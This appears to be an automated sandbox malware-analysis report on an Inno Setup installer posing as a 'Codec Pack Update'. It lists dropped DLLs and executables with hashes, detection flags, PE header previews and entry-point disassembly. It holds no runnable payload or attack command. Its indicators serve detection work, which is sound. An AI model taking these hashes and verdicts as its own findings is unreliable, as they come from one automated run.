                                                                        SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                        MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                        SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                        SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                        SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Codec Pack Update\is-K7UM1.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):68552
                                                                        Entropy (8bit):6.1042544770100395
                                                                        Encrypted:false
                                                                        SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                        MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                        SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                        SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                        SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Codec Pack Update\is-MD4P1.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):704282
                                                                        Entropy (8bit):6.476111921428066
                                                                        Encrypted:false
                                                                        SSDEEP:12288:dhg/qrLc0yVrPg37AzHqA63JJVndjzrN6IRpOA+u1nWXExydV:o/qrQ0yVrPg37AzHqA6Zfn0A3NWXExyL
                                                                        MD5:8FB0A35B2C5618B9AF54186692C1D885
                                                                        SHA1:317FD5BEE39CD02BC6229E437489ECF5C00424DD
                                                                        SHA-256:CD8F08AC8C519080D19CD9B8926A1B8061BF5ECB526E4A6DC3E7392149D29DF4
                                                                        SHA-512:DFA2328C202E37821E297BA6A25B44C958EACDA4191502BC255F819F6B2D0A845A248A6951EDC07E7AE36E6B6397B6025D06D8D0B164A01F96C56D0215646CF8
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,).......0....@..............................................@...........................`...%...@...>..........................................................................................................CODE....\........................... ..`DATA.........0....... ..............@...BSS..........@.......0...................idata...%...`...&...0..............@....tls.................V...................rdata...............V..............@..P.reloc..l...........................@..P.rsrc....>...@...>...X..............@..P....................................@..P........................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Codec Pack Update\is-MU2B9.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):125637
                                                                        Entropy (8bit):6.2640431186303145
                                                                        Encrypted:false
                                                                        SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                        MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                        SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                        SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                        SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Codec Pack Update\libbz2-1.dll (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):105784
                                                                        Entropy (8bit):6.258144336244945
                                                                        Encrypted:false
                                                                        SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                        MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                        SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                        SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                        SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Codec Pack Update\libgcc_s_dw2-1.dll (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):125637
                                                                        Entropy (8bit):6.2640431186303145
                                                                        Encrypted:false
                                                                        SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                        MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                        SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                        SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                        SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Codec Pack Update\libogg-0.dll (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):40974
                                                                        Entropy (8bit):6.485702128133584
                                                                        Encrypted:false
                                                                        SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                        MD5:F47E78AD658B2767461EA926060BF3DD
                                                                        SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                        SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                        SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Codec Pack Update\libvorbis-0.dll (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):176200
                                                                        Entropy (8bit):6.647007817777345
                                                                        Encrypted:false
                                                                        SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                        MD5:6896DC57D056879F929206A0A7692A34
                                                                        SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                        SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                        SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Codec Pack Update\libwinpthread-1.dll (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):68552
                                                                        Entropy (8bit):6.1042544770100395
                                                                        Encrypted:false
                                                                        SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                        MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                        SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                        SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                        SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Codec Pack Update\unins000.dat

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:InnoSetup Log Codec Pack Update, version 0x30, 4672 bytes, 098239\user, "C:\Users\user\AppData\Local\Codec Pack Update"
                                                                        Category:dropped
                                                                        Size (bytes):4672
                                                                        Entropy (8bit):4.69622146446918
                                                                        Encrypted:false
                                                                        SSDEEP:96:IjdWK38Xp/kOgVx9n+eOIhndI4cVSQs0LnVG:mdWK38p//WKHIhd9cVSQ1nM
                                                                        MD5:54A2A8875B4AD5973EC4D4483B48DFC3
                                                                        SHA1:E03CB590D75DECCDB02CC1F75A819D8AAF2ACBB5
                                                                        SHA-256:14330DA6216F8CD829AC3E871C4F321FB7828E4932C2D05BC759FB46F58B5DB3
                                                                        SHA-512:CF56FF46DE89B1773C3AB5C3F5F3E312AC9C4E80EC39957EA96B93E54D2EFFA7C59AE89C7B691524661AACF397FD7E1ADB6226A4E505EB2000EE686C27E39B53
                                                                        Malicious:false
                                                                        Preview:Inno Setup Uninstall Log (b)....................................Codec Pack Update...............................................................................................................Codec Pack Update...............................................................................................................0.......@...%.................................................................................................................".........Q..k......N....098239.user.C:\Users\user\AppData\Local\Codec Pack Update...........9.8.... .....1......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.d

                                                                        C:\Users\user\AppData\Local\Codec Pack Update\unins000.exe (copy)

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):704282
                                                                        Entropy (8bit):6.476111921428066
                                                                        Encrypted:false
                                                                        SSDEEP:12288:dhg/qrLc0yVrPg37AzHqA63JJVndjzrN6IRpOA+u1nWXExydV:o/qrQ0yVrPg37AzHqA6Zfn0A3NWXExyL
                                                                        MD5:8FB0A35B2C5618B9AF54186692C1D885
                                                                        SHA1:317FD5BEE39CD02BC6229E437489ECF5C00424DD
                                                                        SHA-256:CD8F08AC8C519080D19CD9B8926A1B8061BF5ECB526E4A6DC3E7392149D29DF4
                                                                        SHA-512:DFA2328C202E37821E297BA6A25B44C958EACDA4191502BC255F819F6B2D0A845A248A6951EDC07E7AE36E6B6397B6025D06D8D0B164A01F96C56D0215646CF8
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,).......0....@..............................................@...........................`...%...@...>..........................................................................................................CODE....\........................... ..`DATA.........0....... ..............@...BSS..........@.......0...................idata...%...`...&...0..............@....tls.................V...................rdata...............V..............@..P.reloc..l...........................@..P.rsrc....>...@...>...X..............@..P....................................@..P........................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\0RWRPBSuDx.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):693760
                                                                        Entropy (8bit):6.467804610296463
                                                                        Encrypted:false
                                                                        SSDEEP:12288:lhg/qrLc0yVrPg37AzHqA63JJVndjzrN6IRpOA+u1nWXExyd:A/qrQ0yVrPg37AzHqA6Zfn0A3NWXExyd
                                                                        MD5:D8E53E1B8EA1B12BC3F40BB9F8B14F38
                                                                        SHA1:0A0D2B30DA9F9A7F92721AD517087AAA3FDB7278
                                                                        SHA-256:715726ACBFE23EC2E9651B187888C25BEA815CC49933A6CEF1E2110D07E736EB
                                                                        SHA-512:7DBE3AFF2FFD5EB5A424DBECCE6340CB304C7940CC9C758F441E00C485D301A7B74435689E26DB32CADDD66DB3DDC91CC76B008E1A4C5CE10FE2AC1A4437D947
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................,).......0....@..............................................@...........................`...%...@...>..........................................................................................................CODE....\........................... ..`DATA.........0....... ..............@...BSS..........@.......0...................idata...%...`...&...0..............@....tls.................V...................rdata...............V..............@..P.reloc..l...........................@..P.rsrc....>...@...>...X..............@..P....................................@..P........................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_RegDLL.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):4096
                                                                        Entropy (8bit):4.026670007889822
                                                                        Encrypted:false
                                                                        SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                        MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                        SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                        SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                        SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 3%, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_iscrypt.dll

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2560
                                                                        Entropy (8bit):2.8818118453929262
                                                                        Encrypted:false
                                                                        SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                        MD5:A69559718AB506675E907FE49DEB71E9
                                                                        SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                        SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                        SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        • Antivirus: Virustotal, Detection: 1%, Browse
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_setup64.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):6144
                                                                        Entropy (8bit):4.215994423157539
                                                                        Encrypted:false
                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                        MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                        SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                        SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                        SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                        Malicious:true
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\is-KVG27.tmp\_isetup\_shfoldr.dll

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):23312
                                                                        Entropy (8bit):4.596242908851566
                                                                        Encrypted:false
                                                                        SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                        MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                        SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                        SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                        SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.993652999413307
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                        • Inno Setup installer (109748/4) 1.08%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        File name:0RWRPBSuDx.exe
                                                                        File size:1'954'271 bytes
                                                                        MD5:d19197438a7371baaac62fec8dabb3d7
                                                                        SHA1:3252c13b0af9e6a71c11bf9ed37122b3d76064bd
                                                                        SHA256:e2de4097b80b8480f28f08bc4fc238dca38dbdcb6bbb0c77a83e3753cb03dcf7
                                                                        SHA512:7cb352f821f9dfd2fb9dfb2d8b804943ba08e1f428334e79f529a2aed7b66966e5310433b74b6f2870c7e1868668f24a8aa74f475ede929aa3b2d1482e57c8a7
                                                                        SSDEEP:49152:32Y1stnLQ9SkGvzb4siA0Wz3048WUKlvhFKpde2MDmrfyoZ:mrtnfI50d8Wtviqmr6oZ
                                                                        TLSH:7C953311F9285738E0297B304D06F3AA8933F952EE35256CA78D9B6C4F77125C50AFA3
                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                        File Icon

                                                                        Icon Hash:2d2e3797b32b2b99

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x409b24
                                                                        Entrypoint Section:CODE
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:1
                                                                        OS Version Minor:0
                                                                        File Version Major:1
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:1
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:884310b1928934402ea6fec1dbd3cf5e

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFC4h
                                                                        push ebx
                                                                        push esi
                                                                        push edi
                                                                        xor eax, eax
                                                                        mov dword ptr [ebp-10h], eax
                                                                        mov dword ptr [ebp-24h], eax
                                                                        call 00007FC2A4D25B57h
                                                                        call 00007FC2A4D26D5Eh
                                                                        call 00007FC2A4D28F89h
                                                                        call 00007FC2A4D28FD0h
                                                                        call 00007FC2A4D2B8C3h
                                                                        call 00007FC2A4D2BA2Ah
                                                                        xor eax, eax
                                                                        push ebp
                                                                        push 0040A1DBh
                                                                        push dword ptr fs:[eax]
                                                                        mov dword ptr fs:[eax], esp
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 0040A1A4h
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        mov eax, dword ptr [0040C014h]
                                                                        call 00007FC2A4D2C450h
                                                                        call 00007FC2A4D2BFB7h
                                                                        lea edx, dword ptr [ebp-10h]
                                                                        xor eax, eax
                                                                        call 00007FC2A4D295B9h
                                                                        mov edx, dword ptr [ebp-10h]
                                                                        mov eax, 0040CDE4h
                                                                        call 00007FC2A4D25C08h
                                                                        push 00000002h
                                                                        push 00000000h
                                                                        push 00000001h
                                                                        mov ecx, dword ptr [0040CDE4h]
                                                                        mov dl, 01h
                                                                        mov eax, 004072ECh
                                                                        call 00007FC2A4D29E48h
                                                                        mov dword ptr [0040CDE8h], eax
                                                                        xor edx, edx
                                                                        push ebp
                                                                        push 0040A15Ch
                                                                        push dword ptr fs:[edx]
                                                                        mov dword ptr fs:[edx], esp
                                                                        call 00007FC2A4D2C4C0h
                                                                        mov dword ptr [0040CDF0h], eax
                                                                        mov eax, dword ptr [0040CDF0h]
                                                                        cmp dword ptr [eax+0Ch], 01h
                                                                        jne 00007FC2A4D2C5FAh
                                                                        mov eax, dword ptr [0040CDF0h]
                                                                        mov edx, 00000028h
                                                                        call 00007FC2A4D2A249h
                                                                        mov edx, dword ptr [0040CDF0h]
                                                                        cmp eax, dword ptr [edx+00h]

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
